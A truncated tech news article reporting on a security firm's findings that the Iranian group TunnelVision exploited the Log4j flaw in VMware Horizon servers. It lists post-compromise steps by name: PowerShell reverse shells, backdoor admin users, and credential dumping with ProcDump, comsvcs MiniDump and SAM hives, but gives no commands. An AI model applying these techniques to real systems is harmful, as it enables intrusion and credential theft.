State-Sponsored Iranian Hackers Deploy Log4j Security Flaw to Infect Unpatched VMware Users With Ransomware

/in


The Log4j vulnerability once again appeared in compromised systems after the state-sponsored hackers from Iran reportedly attacked the VMware users. 

According to cybersecurity analysts, the notorious group behind this attack is TunnelVision.

TunnelVision Exploits Log4J Flaw 

State-Sponsored Iranian Hackers Deploy Log4j Security Flaw to Infect Unpatched VMware Users With Ransomware

(Photo : Mati Mango from Pexels)
Cybersecurity researchers said that the Iranian group of hackers attacked the VMware servers in the latest Log4j security exploit.

According to a comprehensive report by Sentinel Labs on Thursday, Feb. 17, the hackers became more popular when they hit Java-based logging utility Log4j. 

Since then, they managed to gain access to thousands of apps by relying on remote code execution. During its peak time, it has become one of the most dreaded exploits that occurred on the internet. Experts believed that it would continue to haunt the users in the next few years.

Currently, the controversial group named TunnelVision focused on infecting VMware Horizon. Windows, Linux, and macOS users can run this virtualization product on desktops.

According to Yair Rigevsky and Amitai Ben Shushan Ehrlich from Sentinel One, the Iranian cybercriminals have been active in compromising VMware by deploying backdoors and collecting sensitive information from the victims.

On top of that, they also inject PowerShell commands, as well as create backdoor users. The security flaw started with the Log4j exploit wherein they gain commands through the PS reverse shells thanks to the Tomcat process.

Usually, VMware makes use of Apache Tomcat for the deployment of web applications in Java. From this server, the TunnelVision hackers were able to remotely control the networks.

Related Article: [BREAKING] Iranian Hackers ‘Tutorial’ Video of ‘How-to-Hack’ Gmail or Yahoo Accounts Gets Leaked!

What Iranian Hackers Do After Installing PowerShell

According to another report by Ars Technica, here’s what the TunnelVision group does after finishing the setup.

  • Makes a backdoor user and include it in the network admin group.

  • Conduct execution of reconnaissance commands.

  • Utilizes ProcDump, comsvcs MiniDump, and SAM hive dumps for data collection.

  • Install Ngrok…

Source…